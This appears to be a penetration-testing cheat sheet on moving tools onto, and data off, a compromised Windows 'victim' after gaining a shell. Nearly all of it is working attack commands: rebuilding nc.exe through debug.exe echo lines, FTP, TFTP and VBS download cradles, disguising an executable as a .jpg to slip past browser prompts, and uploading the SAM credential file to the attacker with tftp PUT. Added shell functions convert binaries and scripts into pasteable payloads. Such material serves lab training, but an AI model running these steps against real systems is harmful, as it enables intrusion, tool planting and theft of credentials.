
File Transfers Cheat Sheet by



Note: debug.exe, which rebuilds the file on the victim, cannot write a file larger than 64 KB, so the executable must be under that size. UPX can be used to compress files.

locate exe2bat.exe
wine exe2bat.exe
upx -9 nc.exe (to compress nc.exe)
ls -l nc.exe (should now be smaller)
wine exe2bat.exe /root/nc.exe nc.txt (convert nc.exe to nc.txt)
cat nc.txt | more (should be a hex dump wrapped in echo lines)
Near the end of nc.txt, exe2bat tells the debugger (debug.exe) on the Windows victim to write the bytes back out as an exe

Gain your shell using your usual exploit, then copy and paste the contents of nc.txt into the remote shell. If it fails, re-run any failed commands manually. nc.exe will now be created in the current directory on the victim machine.
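Added example, not part of the original cheat sheet and not exe2bat's own code: a POSIX shell function that does what exe2bat does, so the format of the debug.exe script it produces (e lines, r cx, n, w, q) and the reason for the 64 KB limit are visible. The file names (nc.exe, 1.dd, nc.txt) are illustrative, and the input used to exercise it is a constructed 20-byte stand-in rather than a real executable.

```shell
#!/bin/sh
# exe2debug: shell equivalent of exe2bat (added example, not the page's tool).
# Turns a binary into Windows `echo` lines that rebuild a debug.exe script on
# the victim, then run debug to write the binary back out. Paste the output
# into the remote shell exactly as with exe2bat's nc.txt.

# debug.exe writes BX:CX bytes from offset 0100h of one 64 KiB segment and
# exe2bat only sets CX, so the payload must fit in 0x10000 - 0x100 bytes.
MAX_DEBUG_BYTES=65280

# exe2debug <binary> <name to create on victim> <scratch script name>
# Prints the batch lines on stdout; returns 1 if the binary is too large.
exe2debug() {
    bin=$1; name=$2; scratch=$3
    size=$(wc -c < "$bin" | tr -d ' ')
    if [ "$size" -gt "$MAX_DEBUG_BYTES" ]; then
        echo "error: $bin is $size bytes; debug.exe can only write $MAX_DEBUG_BYTES (try upx -9 first)" >&2
        return 1
    fi
    # od -An -v -tx1: 16 hex bytes per row, no offsets, no '*' for repeated rows.
    # Each row becomes "e <addr> <bytes>", starting at 0100h. No space is left
    # before >> so cmd.exe does not append a trailing blank to the line.
    od -An -v -tx1 "$bin" | {
        addr=256
        while read -r row; do
            [ -n "$row" ] || continue
            printf 'echo e %04x %s>>%s\n' "$addr" "$row" "$scratch"
            addr=$((addr + $(echo "$row" | wc -w)))
        done
    }
    # "r cx" makes debug prompt for a new CX; the next line is the length in hex.
    printf 'echo r cx>>%s\n' "$scratch"
    printf 'echo %x>>%s\n' "$size" "$scratch"
    printf 'echo n %s>>%s\n' "$name" "$scratch"   # output file name
    printf 'echo w>>%s\n' "$scratch"              # write CX bytes from CS:0100
    printf 'echo q>>%s\n' "$scratch"
    printf 'debug<%s\n' "$scratch"
    printf 'del %s\n' "$scratch"
}

# Usage (file names are illustrative): exe2debug nc.exe nc.exe 1.dd > nc.txt
```

The size check is the edge case that matters: anything over the limit silently produces a truncated file on the victim, so compress first with upx and re-run. debug.exe is absent on 64-bit Windows, so this route only works against 32-bit targets.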


python -m SimpleHTTPServer (Python 2; on Python 3 use python3 -m http.server)

Serves the current directory over HTTP on port 8000. Browse to it from the other machine (e.g. from the attacking machine when it runs on the victim) for a directory listing.


nc -lvp 12345 | tar -xf - (on receiver)
tar -cf - filename.txt | nc -vn 192.168.1.14 12345 (on sender)

Note: you get no indication of progress. Wait a while, then press CTRL+C on both ends, and compare md5sum output on each side to confirm the file arrived intact.


FTP - Windows

Connect to an ftp server on port 80 (from the ftp> prompt; a web port helps where only HTTP is allowed out)
open x.x.x.x 80

Connect using commands in config.txt (-n: no auto-login, -v: verbose, -s: run the commands in the file)
ftp -n -v -s:config.txt

Contents of config.txt (after the open line):
user uid1234 (username)
uid1234 (password)

FTP Upload

Outbound FTP is often allowed through corporate firewalls.

pure-pw useradd hacker -u ftpusers -d /ftphome/ (create user hacker; you are prompted for a password)
pure-pw mkdb (rebuild the user database so the new account is active)
cp /pentest/windows/nc.exe /ftphome
/etc/init.d/pure-ftpd start
ftp localhost (test login as hacker)
ls (nc.exe should appear)

Victim (Windows)
After getting a shell:
echo open 192.168.34.10 > ftp.txt (commands to be run in the -s step)
echo myftp>> ftp.txt (username; no space before >>, or a trailing space is written into the file)
echo myftp>> ftp.txt (password; same rule)
echo bin >> ftp.txt (binary mode, or the exe arrives corrupted)
echo get nc.exe >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt (-s: run the commands in ftp.txt)


/etc/init.d/pure-ftpd start (start ftp server)
netstat -antp (confirm server listening on port 21)
/etc/init.d/pure-ftpd stop (stop ftp server)

ls -l /ftphome (home ftp directory created for the ftp user)
cp nc.exe /ftphome (copy netcat to ftphome)
ftp localhost (log in to the ftp server)
ls (netcat should appear)
bin (switch to binary for file transfer)
get nc.exe (confirm file transfer works)
file nc.exe (confirm the file is still a valid PE executable)

Internet Explorer

Useful for getting past firewalls that only allow web browsing out
mv nc.exe nc.jpg (IE pops up a dialog for .exe downloads, so give the file an image extension first)
./ability-linux (gain your remote shell)
cd prog* (Program Files)
cd internet* (Internet Explorer)
start iexplore.exe http://192.168.8.173/nc.jpg (nc.jpg will be downloaded to the temporary internet files directory)
Navigate to the temporary internet files on the victim (e.g. c:\documents and settings\offsec\local settings\temporary internet files)
copy nc.jpg c:\
rename nc.jpg nc.exe
nc.exe (nc should be functional)


'Barabas pure vbs downloader - tested on XP sp2
'Microsoft fixed adodbstream but guess what :)
'(c)dec 2004
'First argument = complete url to download
'Second Argument = filename you want to save
'thnks to http://www.ericphelps.com/scripting/samples/BinaryDownload/
'v2 - now includes proxy support for the winhttp request stuff

strUrl = WScript.Arguments.Item(0)
StrFile = WScript.Arguments.Item(1)

'WinHttpRequest proxy settings.

VBS Download (with down.vbs)

cat download-vbscript (confirm contents: the downloader script above, saved locally)
sed 's/^/echo /' download-vbscript (add echo to the start of each line)
sed 's/^/echo /' download-vbscript | sed 's/$/ >> down.vbs/' (add the append redirect to the end of each line)
sed 's/^/echo /' download-vbscript | sed 's/$/ >> down.vbs/' | grep -v 'echo  >> down.vbs' (drop the lines produced by blank lines; note the two spaces, since a bare echo in cmd prints "ECHO is off.")
/etc/i­nit.d/­apache2 start
cp nc.exe /var/www/

After getting a shell on your Victim:
Copy and paste the text output of the final sed command above and hit enter to create down.vbs.
cscript down.vbs http://192.168.8.173/nc.exe nc2.exe (run down.vbs, which downloads nc.exe and saves it as nc2.exe)
nc2.exe (check that the downloaded file is functional)
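Added example, not the page's sed pipeline and not from the downloader's author: a shell function that wraps any local text file into echo lines for a cmd.exe shell. It serves both the ftp.txt script in the FTP Upload section and the down.vbs downloader here (whatever VBS file you have locally), and it handles two cases the sed pipeline does not: blank lines are kept with echo. instead of being dropped, and the cmd.exe metacharacters & | < > ^ ( ) are escaped with ^ so they reach the file literally. The names download-vbscript and down.vbs are illustrative; the input used to exercise it is a constructed three-line sample.

```shell
#!/bin/sh
# to_cmd_echo: turn a text file into `echo ...>>file` lines that can be pasted
# into a cmd.exe shell to recreate the file on the victim.
# Added example; not the cheat sheet's sed pipeline.

# to_cmd_echo <local source file> <file name to create on the victim>
to_cmd_echo() {
    src=$1; dst=$2
    # `|| [ -n "$line" ]` keeps a final line that lacks a trailing newline.
    while IFS= read -r line || [ -n "$line" ]; do
        if [ -z "$line" ]; then
            # `echo.` writes an empty line; a bare `echo` prints "ECHO is off."
            printf 'echo.>>%s\n' "$dst"
            continue
        fi
        # cmd.exe treats & | < > ^ ( ) specially; prefix each with ^ so it is
        # written literally. % is left alone: at an interactive prompt (where
        # this text is pasted) a lone % is literal, while in a .bat it must be %%.
        esc=$(printf '%s\n' "$line" | sed 's/[&|<>^()]/^&/g')
        # No space before >> so cmd.exe does not append a trailing blank.
        printf 'echo %s>>%s\n' "$esc" "$dst"
    done < "$src"
}

# Usage (names illustrative):
#   to_cmd_echo download-vbscript down.vbs   (paste the output into the shell)
#   to_cmd_echo ftpcmds.txt ftp.txt          (same trick for the ftp -s script)
```

After pasting, run type down.vbs on the victim and compare it with the local file before invoking cscript; a single mangled line is the usual reason the download silently fails.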

TFTP Server

apt-get install atftpd
atftpd --daemon --port 69 /tmp (start in daemon mode on port 69, home directory /tmp)
atftpd --daemon --port 1234 /tmp (alternatively, start on port 1234, home directory /tmp)
netstat -anup | grep atftp (should be listening on udp port 69)
cp /nc.exe /tmp

Downloading in Linux
tftp localhost (connect to the server; then at the tftp> prompt:)
get nc.exe
ls -l nc.exe
file nc.exe

Kill Server
ps -ef | grep atftp
kill -9 16084 (the PID is the second column of the ps -ef output)
netstat -anup | grep 69 (confirm server has been killed)


Note: most corporate firewalls block outbound traffic such as UDP/69, rendering TFTP unusable. The tftp client is an optional feature on newer Windows versions and may not be installed. Transferred files will usually be read-only; clear the attribute with attrib -r filename before deleting.

Download from Attacker
atftpd --daemon --port 69 /tmp
cp /usr/share/windows-binaries/nc.exe /tmp
chmod 777 /tmp/nc.exe

Initiate your remote shell to the Windows PC using your exploit:
./ability-linux (ability exploit, served, shell started)
tftp -i 192.168.23.10 GET nc.exe (on the Windows victim; IP = Kali; -i = binary/octet mode)

Upload to Attacker
tftp -i 192.168.8.172 PUT sam
sam should now appear in /tmp on the Kali machine

Download in Windows
tftp get :/lanscan (get the file lanscan from the TFTP server)

